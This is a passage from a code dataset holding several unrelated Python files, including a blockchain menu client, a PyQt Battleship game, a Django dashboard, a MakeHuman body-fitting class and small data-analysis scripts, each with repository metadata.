by this SPARQL query.\\n\"\n 'Note: \"?main_subject_item\" has to be selected for it to work, see the example above.\\n'\n \"Note: MINUS {?main_subject_item wdt:P1889 [].} must be present in the query to avoid false positives.\",\n )\n parser.add_argument(\n \"--debug-sparql\",\n action=\"store_true\",\n help=\"Enable debugging of SPARQL queries.\",\n default=False,\n )\n parser.add_argument(\n \"--no-ask-match-more-limit\",\n \"--limit\",\n nargs=\"?\",\n type=int,\n help=\"When working on SPARQL queries of e.g. galaxies, match more until this many matches are in the job sparql_items\",\n )\n return parser.parse_args()\n","repo_name":"dpriskorn/ItemSubjector","sub_path":"src/helpers/argparse_setup.py","file_name":"argparse_setup.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"37808951497","text":"import random\nimport json\n\ndef randomization_test(l_target, l_base, met):\n total_test = 5000\n diff = sum(l_target) / float(len(l_target)) - sum(l_base) / float(len(l_base))\n cnt = 0.0\n for i in range(total_test):\n l_a, l_b = random_swap(l_target, l_base)\n this_diff = sum(l_a) / float(len(l_a)) - sum(l_b) / float(len(l_b))\n if this_diff > diff:\n cnt += 1.0\n p = cnt / float(total_test)\n print(\"Metrics: \", met, \"Our: \", sum(l_target) / float(len(l_target)), \"KCM: \", sum(l_base) / float(len(l_base)), \"Diff: \", diff, \"P-Value\", p)\n return p\n\n\ndef random_swap(l_target, l_base):\n l_a = list(l_target)\n l_b = list(l_base)\n\n for i in range(len(l_target)):\n if random.randint(0, 1):\n l_a[i], l_b[i] = l_b[i],l_a[i]\n return l_a, l_b\n\ndef cal_sig_old_new_format():\n f1 = open('/shared/djjindal/ASD/data/full/preds/m1/base_supfull_U.json', 'r')\n f2 = open('/shared/djjindal/ASD/data/full/preds/m2/base_frame2_supfull_U.json', 'r')\n l_target, l_base = dict(), dict()\n i = 0\n line = f1.readline()\n model_dict = json.loads(f2.readline())\n metric_list = [\"p@01\", \"p@05\", \"p@10\", \"p@20\", \"up@01\", \"up@05\", \"up@10\", \"up@20\", \"ur@01\", \"ur@05\",\"ur@10\", \"ur@20\", \"nr@01\", \"nr@05\", \"nr@10\", \"nr@20\"]\n for met in metric_list:\n l_target[met] = []\n l_base[met] = []\n \n while(line):\n base_json = json.loads(line)\n key = base_json['docno']\n if key in model_dict:\n model_json = model_dict[key]\n for met in metric_list:\n l_target[met].append(model_json[met])\n l_base[met].append(base_json[\"eval\"][met])\n i+=1\n line = f1.readline()\n print(\"Running randomization_test on \", i, \"samples\")\n for met in metric_list:\n print(met, sum(l_base[met]) / float(len(l_base[met])))\n print(met, sum(l_target[met]) / float(len(l_target[met])))\n if( sum(l_target[met]) / float(len(l_target[met])) > sum(l_base[met]) / float(len(l_base[met]))):\n pval = randomization_test(l_target[met], l_base[met], met)\n \n\ndef cal_sig_new_format():\n f1 = open('/shared/djjindal/ASD/data/full/preds/m3/base_frame_sl_unem_supfull_U.json', 'r')\n f2 = open('/shared/djjindal/ASD/data/full/preds/m4/base_frame_sl_nem_ps_supfull_U.json', 'r')\n l_target, l_base = dict(), dict()\n i = 0\n model1_dict = json.loads(f1.readline())\n model2_dict = json.loads(f2.readline())\n metric_list = [\"up@01\", \"up@05\", \"up@10\",\"ur@01\", \"ur@05\",\"ur@10\"]\n for met in metric_list:\n l_target[met] = []\n l_base[met] = []\n \n for key in model1_dict:\n try:\n base_json = model1_dict[key]\n model_json = model2_dict[key]\n for met in metric_list:\n l_target[met].append(model_json[met])\n l_base[met].append(base_json[met])\n except:\n print(\"Error \", key)\n print(\"Running randomization_test on \", len(l_base[met]), \"samples\")\n for met in metric_list:\n print(met, sum(l_base[met]) / float(len(l_base[met])))\n print(met, sum(l_target[met]) / float(len(l_target[met])))\n if( sum(l_target[met]) / float(len(l_target[met])) > sum(l_base[met]) / float(len(l_base[met]))):\n pval = randomization_test(l_target[met], l_base[met], met)\n \ncal_sig_new_format() \n \n ","repo_name":"CogComp/Salient-Event-Detection","sub_path":"src/eval/significance.py","file_name":"significance.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"10018351677","text":"import Client\nimport Transaction\nimport Block\nimport Miner\nfrom os import system, name\n\n#As a First, Initialize all the Nodes and add them to a dictionary\nprint(\"Initializing all the Nodes ... \")\nuser1inst = Client.Client()\nuser2inst = Client.Client()\nuser3inst = Client.Client()\nuser4inst = Client.Client()\nuser5inst = Client.Client()\nnodeMap = {\"user1\":user1inst, \"user2\":user2inst, \"user3\":user3inst, \"user4\":user4inst, \"user5\":user5inst}\nprint('All the Nodes initialized')\n\n#Public Transaction Queue - A Global List. Each newly created Transaction will be appended here\nglobal_chain_transactions = []\n\n#Public List of Blocks - To be chained in the actual Blockchain\nglobal_GavCoins = []\n\n#Global variable as each block needs the value of the previous block's hash\nglobal_last_block_hash = \"\"\n\n#To track number of transactions mined - transaction index\nglobal_last_transaction_index = 0\n\n#Method to get the User Choice as input\ndef get_user_choice():\n\tuser_input = input('Your Choice: ')\n\treturn user_input\n\n#Method to Add a New Transaction. After the Transaction, there is a need to sign the transaction, so will call the sign_transaction method.\n#This will return the signature in printable format, which can be persisted for reference.\ndef add_new_transaction():\n\tclientInstance = Client.Client()\n\tsender = input('Enter the name of the sender: ')\n\trecipient = input('Enter the name of the receiver: ')\n\tnosCoin = input(\"Enter the number of Coins to be Transferred: \")\n\t#nodeList = clientInstance.get_nodes()\n\t#print(nodeList)\n\t#Checks if the entered values exists as nodes\n\tif (sender in nodeMap) and (recipient in nodeMap):\n\t\t#print(\"Nodes are existing\")\n\t\ttransactionInstance = Transaction.Transaction(nodeMap[sender],nodeMap[recipient].identity,nosCoin)\n\t\ttransactionInstance.sign_transaction()\n\t\tglobal_chain_transactions.append(transactionInstance)\n\telse:\n\t\tprint(\"Nodes are not existing\") \n\n#Logic to clear the console for clean inputs\ndef clear_screen():\n\t#OS Name for Ubuntu is posix - OS NAME check\n\tif name == 'posix':\n\t\t_ = system('clear')\n\telif name == 'nt':\n\t\t#For Windows\n\t\t_ = system('cls')\n\t#print(\"Name is: \", name)\n\n#Menu Option for the Blockchain Users\nwaiting_for_input = True\nwhile waiting_for_input:\n\tprint(\"Please Choose from the below options: \")\n\tprint(\"1 - To Add a New Transaction\")\n\tprint(\"2 - See the Transactions Added\")\n\tprint(\"3 - Start a Block Chain\")\n\tprint(\"4 - Add Blocks to the Blockchain\")\n\tprint(\"5 - To see all the Blocks in the Blockchain\")\n\tprint(\"6 - QUIT\")\n\tuser_choice = get_user_choice()\n\tprint(\"USER CHOICE: \", user_choice)\n\tif user_choice == '1':\n\t\tprint(\"User Selected 1\")\n\t\tclear_screen()\n\t\tadd_new_transaction()\n\t\n\telif user_choice == '2':\n\t\tclear_screen()\n\t\tprint(\"The total number of transactions added: \", len(global_chain_transactions))\n\t\tprint(\"The transactions are: \")\n\t\ttrans = Transaction.Transaction()\n\t\ttrans.display_transaction(global_chain_transactions)\n\t\n\telif user_choice == '3':\n\t\tclear_screen()\n\t\tprint(\"Starting the Blockchain. This will start a chain afresh with a Genesis Block\")\n\t\tt0 = Transaction.Transaction(\"Genesis\",user1inst.identity,500)\n\t\tblock0 = Block.Block()\n\t\t#Initializing the block constituents (previous block and nonce) as 'None' as this is the first block of the chain\n\t\tblock0.previous_block_hash = None\n\t\tblock0.Nonce = None\n\t\tblock0.verified_transactions.append(t0)\n\t\t\n\t\t#Now, hash the Genesis block and store the value in the global variable\n\t\thashVal = hash(block0)\n\t\tglobal_last_block_hash = hashVal\n\t\tprint(\"Adding the Genesis Block to the Blockchain\")\n\t\tglobal_GavCoins.append(block0)\n\t\n\telif user_choice == '4':\n\t\tclear_screen()\n\t\tblock = Block.Block()\n\t\tminer = Miner.Miner()\n\t\tfor i in range(3):\n\t\t\ttemp_transaction = global_chain_transactions[global_last_transaction_index]\n\t\t\t#TBD - VALIDATE TRANSACTION\n\t\t\t#TBD - BELOW TO BE Added only if the transaction is valid\n\t\t\tblock.verified_transactions.append(temp_transaction)\n\t\t\tglobal_last_transaction_index += 1\n\t\t\n\t\tblock.previous_block_hash = global_last_block_hash\n\t\tblock.Nonce = miner.mine(block, 2)\n\t\tdigest = hash(block)\n\t\tglobal_GavCoins.append(block)\n\t\tglobal_last_block_hash = digest\n\t\t\n\t\n\telif user_choice == '5':\n\t\tclear_screen()\n\t\tblockInstance = Block.Block()\n\t\tblockInstance.showBlockchain(global_GavCoins)\n\t\n\telif user_choice == '6':\n\t\twaiting_for_input = False\n\t\n\telse:\n\t\tprint(\"Invalid Input. Please choose from the options suggested\")\n #need to add proof of work, need to give al miners a chance to mine blockcs.\n #this is more of a\n #menu options give over a browser, new window to use multiple nodes different sessions","repo_name":"GavinAren/Nea_blockchain","sub_path":"BlockChainClient.py","file_name":"BlockChainClient.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43095148508","text":"\"\"\"Constants for the gehome integration.\"\"\"\nfrom gehomesdk.clients.const import LOGIN_URL\n\nDOMAIN = \"ge_home\"\n\nEVENT_ALL_APPLIANCES_READY = 'all_appliances_ready'\n\nUPDATE_INTERVAL = 30\nASYNC_TIMEOUT = 30\nMIN_RETRY_DELAY = 15\nMAX_RETRY_DELAY = 1800\nRETRY_OFFLINE_COUNT = 5\n\nSERVICE_SET_TIMER = \"set_timer\"\nSERVICE_CLEAR_TIMER = \"clear_timer\"\nSERVICE_SET_INT_VALUE = \"set_int_value\"","repo_name":"mfrericks/GE-Home","sub_path":"custom_components/ge_home/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"21599463578","text":"#!/bin/python\n\n'''\nAuthor: Sourav Sarkar\nDate: November 27, 2021\nEmail: ssarkar1@ualberta.ca\nDescription: This script takes the h5 file and scales it's features using the\n\tmean and standard deviation for all the respective feature values\n'''\nnode_features = [\n \"ResidualTime\", \"PhotonTrackLength\", \"ChargeFirstPulse\",\n \"TrackDOMDistance\", \"TotalCharge\", \"TimeMaxPulse\",\n \"ChargeMaxPulse\", \"DeltaTimeStd\"\n ]\n\ngraph_features = [\n \"InitialTrackIntensity\", \"FinalTrackIntensity\",\n \"TrackSmoothness\", \"EventCharge\", \"EventTracklength\"\n ]\n\nimport h5py as h5\nimport numpy as np\n\n\ngetfileloc = \"/data/user/ssarkar/TridentProduction/reconstruction/trident_gnn/dataset/resampled_dataset_8/dataset_split/\"\ngfile = h5.File(getfileloc+\"train.h5\",\"r\")\nnscale = gfile[\"NodeScaleInfo\"]\nnmean= nscale[\"MeanValue\"]\nnstd = nscale[\"StdValue\"]\ngscale = gfile[\"GraphScaleInfo\"]\ngmean = gscale[\"MeanValue\"]\ngstd = gscale[\"StdValue\"]\n\nfileloc=\"/data/user/ssarkar/TridentProduction/reconstruction/trident_gnn/dataset/cc_dataset_10/\"\nf_train = h5.File(fileloc+\"merged_numu_trident.h5\", \"a\")\n\nfor i,key in enumerate(node_features):\n\tstdval = nstd[:][i]\n\tmeanval= nmean[:][i]\n\tprint (stdval,meanval)\n\tf_train[key][:] = (f_train[key][:]*stdval)+meanval\n\tminv = np.min(f_train[key][:])\n\tmaxv = np.max(f_train[key][:])\n\tprint (f\"Post scaling range: {key} : min:{minv}, max:{maxv}\")\n\nfor i,key in enumerate(graph_features):\n\tstdval = gstd[:][i]\n\tmeanval = gmean[:][i]\n\n\tprint (stdval,meanval)\n\tf_train[key][:] = (f_train[key][:]*stdval)+meanval\n\n\tminv = np.min(f_train[key][:])\n\tmaxv = np.max(f_train[key][:])\n\tprint (f\"Post scaling range: {key} : min:{minv}, max:{maxv}\")\n\n\n#g11 = f_train.create_group('NodeScaleInfo')\n#g12 = f_train.create_group('GraphScaleInfo')\n\n\n\nf_train.close()\n\n","repo_name":"ssarkarbht/TridentGNNClassifier","sub_path":"feature_modules/feature_scaleback.py","file_name":"feature_scaleback.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14926394032","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QPixmap, QIcon\nfrom PyQt5.QtWidgets import *\n\nfrom Interface.Slots import Slots\nfrom Interface.GraphicsScene import GraphicsScene\n\n\nclass MainWindow():\n def __init__(self):\n self.central_widget = QWidget()\n self.main_grid_layout = QGridLayout(self.central_widget)\n self.slots = Slots(self)\n\n self.scene_gamer = GraphicsScene()\n self.scene_comp = GraphicsScene()\n self.view_gamer = QGraphicsView(self.scene_gamer)\n self.view_comp = QGraphicsView(self.scene_comp)\n\n self.protocol = QTextEdit()\n\n self.interactive = QGroupBox(self.central_widget)\n self.lbl_ships_set = QLabel(self.interactive)\n self.start_game = QCommandLinkButton(self.interactive)\n self.auto = QRadioButton(self.interactive)\n self.hand = QRadioButton(self.interactive)\n self.set_ships = QCommandLinkButton(self.interactive)\n self.up = QLabel(self.interactive)\n self.down = QLabel(self.interactive)\n self.left = QLabel(self.interactive)\n self.right = QLabel(self.interactive)\n self.rotate = QLabel(self.interactive)\n self.set_lbl = QLabel(self.interactive)\n\n self.ships = QGroupBox(self.central_widget)\n self.count_g = [QLabel(self.ships) for i in range(4)]\n self.count_c = [QLabel(self.ships) for i in range(4)]\n\n self.font = QFont()\n self.font.setPixelSize(18)\n\n self.initUi()\n\n def initUi(self):\n self.central_widget.setFixedSize(1050, 580)\n self.central_widget.setWindowIcon(QIcon(\"icon.ico\"))\n self.central_widget.setWindowTitle(\"Морской бой\")\n self.protocol.setReadOnly(True)\n self.create_fields()\n self.main_grid_layout.addWidget(self.protocol, 1, 2, 16, 1)\n self.create_footer()\n self.create_interactive()\n self.stat_ships()\n self.connection()\n self.central_widget.show()\n\n def create_footer(self):\n name_gamer = QGroupBox(self.central_widget)\n name_comp = QGroupBox(self.central_widget)\n name_protocol = QGroupBox(self.central_widget)\n\n lbl_gamer = QLabel(name_gamer)\n lbl_comp = QLabel(name_comp)\n lbl_protocol = QLabel(name_protocol)\n\n lbl_gamer.setFixedWidth(350)\n lbl_gamer.setText(\"Поле Игрока\")\n lbl_gamer.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_gamer.setFont(self.font)\n lbl_comp.setFixedWidth(350)\n lbl_comp.setText(\"Поле Противника\")\n lbl_comp.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_comp.setFont(self.font)\n lbl_protocol.setFixedWidth(300)\n lbl_protocol.setText(\"Протокол\")\n lbl_protocol.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_protocol.setFont(self.font)\n\n self.main_grid_layout.addWidget(name_gamer, 0, 0, 1, 1)\n self.main_grid_layout.addWidget(name_comp, 0, 1, 1, 1)\n self.main_grid_layout.addWidget(name_protocol, 0, 2, 1, 1)\n\n def create_fields(self):\n self.scene_gamer.setSceneRect(0, 0, 290, 290)\n self.scene_comp.setSceneRect(0, 0, 290, 290)\n self.view_gamer.setFixedSize(292, 292)\n self.view_comp.setFixedSize(292, 292)\n\n field_gamer = QGroupBox(self.central_widget)\n field_comp = QGroupBox(self.central_widget)\n\n lbl_num_gamer = QLabel()\n lbl_char_gamer = QLabel()\n lbl_num_gamer.setText(\"1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n10\")\n lbl_char_gamer.setText(\"  А Б В Г Д   Е Ё   Ж   З   И\")\n\n fontH = QFont()\n fontH.setPixelSize(20)\n fontV = QFont()\n fontV.setPixelSize(24)\n\n lbl_num_gamer.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_char_gamer.setFont(fontH)\n lbl_num_gamer.setFont(fontV)\n\n field_gamer.setFixedSize(350, 350)\n lay_gamer = QGridLayout(field_gamer)\n\n lay_gamer.addWidget(lbl_char_gamer, 0, 1, 1, 8)\n lay_gamer.addWidget(lbl_num_gamer, 1, 0, 8, 1)\n lay_gamer.addWidget(self.view_gamer, 1, 1, 8, 8)\n\n field_comp.setFixedSize(350, 350)\n lay_comp = QGridLayout(field_comp)\n\n lbl_num_comp = QLabel()\n lbl_char_comp = QLabel()\n lbl_num_comp.setText(\"1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n10\")\n lbl_char_comp.setText(\"  А Б В Г Д   Е Ё   Ж   З   И\")\n lbl_num_comp.setAlignment(Qt.AlignHCenter | Qt.AlignBottom)\n lbl_char_comp.setFont(fontH)\n lbl_num_comp.setFont(fontV)\n\n lay_comp.addWidget(lbl_char_comp, 0, 1, 1, 8)\n lay_comp.addWidget(lbl_num_comp, 1, 0, 8, 1)\n lay_comp.addWidget(self.view_comp, 1, 1, 8, 8)\n\n self.main_grid_layout.addWidget(field_gamer, 1, 0, 12, 1)\n self.main_grid_layout.addWidget(field_comp, 1, 1, 12, 1)\n\n def create_interactive(self):\n lay = QGridLayout(self.interactive)\n self.start_game.setFixedHeight(50)\n self.lbl_ships_set.setText(\"Установить корабли\")\n self.lbl_ships_set.setAlignment(Qt.AlignHCenter | Qt.AlignTop)\n self.auto.setText(\"Автоматически\")\n self.auto.setChecked(True)\n self.hand.setText(\"Вручную\")\n self.set_ships.setText(\"Начать установку\")\n\n self.auto.setFont(self.font)\n self.hand.setFont(self.font)\n self.lbl_ships_set.setFont(self.font)\n\n lay.addWidget(self.lbl_ships_set, 0, 0, 1, 2)\n lay.addWidget(self.auto, 1, 0, 1, 1)\n lay.addWidget(self.hand, 1, 1, 1, 1)\n lay.addWidget(self.set_ships, 2, 0, 1, 2)\n\n self.start_game.setText(\"Начать новую игру\")\n lay.addWidget(self.start_game, 1, 0, 1, 2)\n self.start_game.setVisible(False)\n\n self.up.setText(\"↑ - Вверх\")\n self.down.setText(\"↓ - Вниз\")\n self.left.setText(\"← - Влево\")\n self.right.setText(\"→ - Вправо\")\n self.rotate.setText(\"ctrl - Повернуть\")\n self.set_lbl.setText(\"space - Установить\")\n self.up.setFont(self.font)\n self.down.setFont(self.font)\n self.left.setFont(self.font)\n self.right.setFont(self.font)\n self.rotate.setFont(self.font)\n self.set_lbl.setFont(self.font)\n self.up.setVisible(False)\n self.down.setVisible(False)\n self.left.setVisible(False)\n self.right.setVisible(False)\n self.rotate.setVisible(False)\n self.set_lbl.setVisible(False)\n lay.addWidget(self.up, 0, 0, 1, 1)\n lay.addWidget(self.down, 0, 1, 1, 1)\n lay.addWidget(self.left, 1, 0, 1, 1)\n lay.addWidget(self.right, 1, 1, 1, 1)\n lay.addWidget(self.rotate, 2, 0, 1, 1)\n lay.addWidget(self.set_lbl, 2, 1, 1, 1)\n\n self.main_grid_layout.addWidget(self.interactive, 13, 0, 4, 1)\n\n def stat_ships(self):\n for i in range(1, 5):\n self.count_g[i - 1].setText(f\" - {5 - i}\")\n self.count_g[i - 1].setFont(self.font)\n self.count_c[i - 1].setText(f\" - {5 - i}\")\n self.count_c[i - 1].setFont(self.font)\n\n lay = QGridLayout(self.ships)\n title = QLabel(self.ships)\n title.setText(\"Корабли\")\n title.setFont(self.font)\n title.setAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\n ship4 = QPixmap()\n ship4.load(\"4-палубник.png\")\n ship4g = QLabel(self.ships)\n ship4g.setPixmap(ship4)\n ship4c = QLabel(self.ships)\n ship4c.setPixmap(ship4)\n\n ship3 = QPixmap()\n ship3.load(\"3-палубник.png\")\n ship3g = QLabel(self.ships)\n ship3g.setPixmap(ship3)\n ship3c = QLabel(self.ships)\n ship3c.setPixmap(ship3)\n\n ship2 = QPixmap()\n ship2.load(\"2-палубник.png\")\n ship2g = QLabel(self.ships)\n ship2g.setPixmap(ship2)\n ship2c = QLabel(self.ships)\n ship2c.setPixmap(ship2)\n\n ship1 = QPixmap()\n ship1.load(\"1-палубник.png\")\n ship1g = QLabel(self.ships)\n ship1g.setPixmap(ship1)\n ship1c = QLabel(self.ships)\n ship1c.setPixmap(ship1)\n\n lay.addWidget(title, 0, 0, 1, 4)\n lay.addWidget(ship4g, 1, 0, 1, 1)\n lay.addWidget(ship4c, 1, 2, 1, 1)\n lay.addWidget(self.count_g[3], 1, 1, 1, 1)\n lay.addWidget(self.count_c[3], 1, 3, 1, 1)\n lay.addWidget(ship3g, 2, 0, 1, 1)\n lay.addWidget(ship3c, 2, 2, 1, 1)\n lay.addWidget(self.count_g[2], 2, 1, 1, 1)\n lay.addWidget(self.count_c[2], 2, 3, 1, 1)\n lay.addWidget(ship2g, 3, 0, 1, 1)\n lay.addWidget(ship2c, 3, 2, 1, 1)\n lay.addWidget(self.count_g[1], 3, 1, 1, 1)\n lay.addWidget(self.count_c[1], 3, 3, 1, 1)\n lay.addWidget(ship1g, 4, 0, 1, 1)\n lay.addWidget(ship1c, 4, 2, 1, 1)\n lay.addWidget(self.count_g[0], 4, 1, 1, 1)\n lay.addWidget(self.count_c[0], 4, 3, 1, 1)\n\n self.main_grid_layout.addWidget(self.ships, 13, 1, 4, 1)\n\n def connection(self):\n self.start_game.clicked.connect(self.slots.start_game)\n self.set_ships.clicked.connect(self.slots.begin_game)\n self.scene_comp.click_for_show_coord.connect(self.slots.shoot)\n self.scene_gamer.click_up.connect(self.slots.up)\n self.scene_gamer.click_down.connect(self.slots.down)\n self.scene_gamer.click_left.connect(self.slots.left)\n self.scene_gamer.click_right.connect(self.slots.right)\n self.scene_gamer.click_rotate.connect(self.slots.rotate)\n self.scene_gamer.click_set.connect(self.slots.space)\n","repo_name":"Momami/SeeBattle","sub_path":"Interface/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":9679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8974077608","text":"from c_Logic.A_LL_API import LL_API\n\nclass UI_Aircraft :\n def __init__(self, logicAPI_in ) :\n self.la = logicAPI_in\n\n def register_aircraft_UI(self):\n ''' Registers aircrafts and adds it to CSV '''\n register = True\n while register == True :\n print(\"-=x=\"*15)\n print(\" \"*21 +\"Register airplanes\")\n print(\"-=x=\"*15 + \"\\n\")\n nickname = input(\"Plane nickname: \").upper()\n aircraftID = input(\"Aircraft ID (e.g TF-XXX): \").upper()\n if self.la.check_aircraftid(aircraftID) == False :\n print(\"\\nNot a valid aircraftID!\\n\")\n break\n print(\"\\t(1) - NAFokkerF100\") \n print(\"\\t(2) - NABAE146\")\n print(\"\\t(3) - NAFokkerF28\")\n pick = input(\"Pick a new licence: \") \n if pick == \"1\":\n planeTypeId = \"NAFokkerF100\"\n capacity = \"100\"\n manufacturer = \"Fokker\"\n print(\"Plane type ID: {} - Capacity: {} - Manufacturer: {}\".format(planeTypeId, capacity, manufacturer))\n elif pick == \"2\":\n planeTypeId = \"NABAE146\"\n capacity = \"82\"\n manufacturer = \"BAE\"\n print(\"Plane type ID: {} - Capacity: {} - Manufacturer: {}\".format(planeTypeId, capacity, manufacturer))\n elif pick == \"3\":\n planeTypeId = \"NAFokkerF28\"\n capacity = \"65\"\n manufacturer = \"Fokker\"\n print(\"Plane type ID: {} - Capacity: {} - Manufacturer: {}\".format(planeTypeId, capacity, manufacturer))\n input(\"\\nPress ENTER to continue..\")\n print()\n self.la.addnewaircraft(nickname,aircraftID,planeTypeId,capacity,manufacturer)\n break","repo_name":"noifjalar/NANAIR","sub_path":"b_UI/UI_Aircraft.py","file_name":"UI_Aircraft.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15695739250","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n# ZatFits\n# Wed 16 Apr\n\nimport importlib\nfrom ZTmeasuretarget import ZTMeasureTarget\nimport time\n\n\nclass ZThuman:\n '''\n Implementing ZatFits version of human.\n This class will directly use MH version of human class.\n /!\\ THIS IS NOT MADE for app.selectedHuman /!\\\n '''\n\n def __init__(self, h, app, key):\n self.containedHuman = h\n self.app = app\n self.key = key\n self.associate_dict = {'hip': ('hip-scale-vert-decr', 'hip-scale-vert-incr')}\n self.targetlist = []\n\n def __str__(self):\n return 'Human [%s]' % self.key\n\n def __repr__(self):\n return self.__str__()\n\n def save(self, path):\n self.app.saveHuman(path, self.containedHuman)\n\n def associate(self, target):\n return self.associate_dict[target]\n\n def modify(self, modification_list):\n # Instantiate the humanmodifier\n if self.app.humanmodifier is None:\n self.app.humanmodifier = importlib.import_module('humanmodifier')\n\n # Getting modifications from json\n if modification_list:\n for modification in modification_list:\n new_target = ZTMeasureTarget(self.app,\n name=modification['target'],\n value=float(modification['value']))\n self.targetlist.append(new_target)\n self.containedHuman.applyAllTargets()\n\n # Preliminary measurements\n allisMeasured = 0.\n for target in self.targetlist:\n target.measure = self.app.ztruler.getMeasure(self.containedHuman,\n target.name,\n target.units)\n allisMeasured += target.compareMeasureTarget()\n\n # Dicotomy loop\n iteration = 0\n while allisMeasured != 0.:\n dicotomystarttime = time.time()\n for target in self.targetlist:\n if target.isMeasureInferiorToValue():\n target.miniter = target.iterval\n target.setIter()\n target.setModifierIter(target.iterval)\n elif target.isMeasureSuperiorToValue():\n target.maxiter = target.iterval\n target.setIter()\n target.setModifierIter(target.iterval)\n else:\n target.goal = 0.\n self.containedHuman.applyAllTargets(update=True)\n\n dicotomyendtime = time.time()\n iteration = iteration + 1\n t = dicotomyendtime - dicotomystarttime\n print(t)\n # requests measurements\n allisMeasured = 0.\n for target in self.targetlist:\n target.measure = self.app.ztruler.getMeasure(self.containedHuman,\n target.name,\n target.units)\n if abs(target.iterval) > (target.initial_max_iter - 0.001)\\\n or abs(target.iterval) < (target.initial_min_iter + 0.001):\n r = 0.\n else:\n r = target.compareMeasureTarget()\n\n if r == 0:\n allisMeasured += r\n","repo_name":"ludoimerir/testzatfits","sub_path":"zatfits/servers/makehuman/apps/ZThuman.py","file_name":"ZThuman.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30482782292","text":"from itertools import chain, combinations\nfrom collections import Counter\n\ndef counter_to_list(data):\n if type(data) == Counter:\n data = list(data.items())\n return [val for val, cnt in data for i in range(cnt)]\n\ndef max_values_dict(data):\n max_value = max(data.values())\n return [k for k,v in data.items() if v == max_value], max_value\n\ndef merge_list(data):\n return list(itertools.chain(*data))\n\ndef get_all_combos(data): # accepts a counter.\n combos = [{}]\n for key in data:\n if data[key] == 0:\n for c in combos:\n c[key] = 0\n else:\n new_combos = []\n for c in combos:\n for i in range(data[key]+1):\n nc = c.copy()\n nc[key] = i\n new_combos.append(nc)\n combos = new_combos\n return combos\n\ndef unique_combinations(data, size):\n data = counter_to_list(data)\n combos = list(combinations(data, size))\n return set(combos)\n\n# a = Counter({\"a\":3, \"b\":4, \"c\":2, \"d\":0})\n# for i in unique_combinations(a, 5):\n# print(i)\n\nplayer_colors = [\"blue\", \"red\", \"green\", \"purple\"]\n","repo_name":"kindalime/catan-agent","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15996365736","text":"from django.shortcuts import render\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.db import connection\n\nfrom projects.utils import namedtuplefetchall\n\nfrom django.http import JsonResponse\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib import messages\nfrom datetime import datetime\n\n# Create your views here.\ndef landing(request):\n return render(request,'home/landing.html')\n\n@login_required\n@csrf_exempt\ndef dashboard(request):\n if request.method ==\"POST\":\n data = request.POST\n try:\n id = data.get('id')\n id= int(json.loads(id))\n with connection.cursor() as curr:\n curr.execute(\"DELETE FROM reminder WHERE `index` = %s\",[id])\n\n return JsonResponse(1,safe=False)\n except:\n data = request.POST\n desc = json.loads(data.get('reminder'))\n\n if desc == '':\n messages.warning(request,message=\"Empty Reminder Cannot be added\")\n return JsonResponse(1,safe=False)\n else:\n prior = json.loads(data.get('priority'))\n if prior == \"High\":\n prior = 1\n else:\n prior = 0\n with connection.cursor() as curr:\n curr.execute(\"INSERT INTO reminder(id,description,priority) VALUES (%s,%s,%s)\",\n [request.user.id, desc, prior])\n return JsonResponse(1, safe=False)\n else:\n with connection.cursor() as curr:\n curr.execute(\"SELECT * FROM reminder WHERE id = %s\", [request.user.id])\n res = namedtuplefetchall(curr)\n now = datetime.now()\n day = now.strftime(\"%A\")\n month = now.strftime(\"%B\")\n crtime = now.strftime('%H:%M')\n date = now.date().day\n time = {\n 'time': crtime,\n 'day': day,\n 'month': month,\n 'date': date\n }\n return render(request, 'home/dashboard.html', {'result': res, 'time': time})\n","repo_name":"ayush113/CompanyManagement","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41689177031","text":"from . import input_configuration\nfrom . import metadata\nfrom . import node_base\n\n# For H264, there are different profiles with different required command line\n# arguments.\nprofile_args = {\n 'baseline': ['-profile:v', 'baseline', '-level:v', '3.0'],\n 'main': ['-profile:v', 'main', '-level:v', '3.1'],\n 'high': ['-profile:v', 'high', '-level:v', '4.0'],\n 'uhd': ['-profile:v', 'high', '-level:v', '5.1'],\n}\n\nclass TranscoderNode(node_base.NodeBase):\n\n def __init__(self, input_paths, output_audios, output_videos, input_config, config):\n super().__init__()\n self._input_paths = input_paths\n self._output_audios = output_audios\n self._output_videos = output_videos\n self._input_config = input_config\n self._config = config\n\n assert len(input_config.inputs) == len(input_paths)\n\n 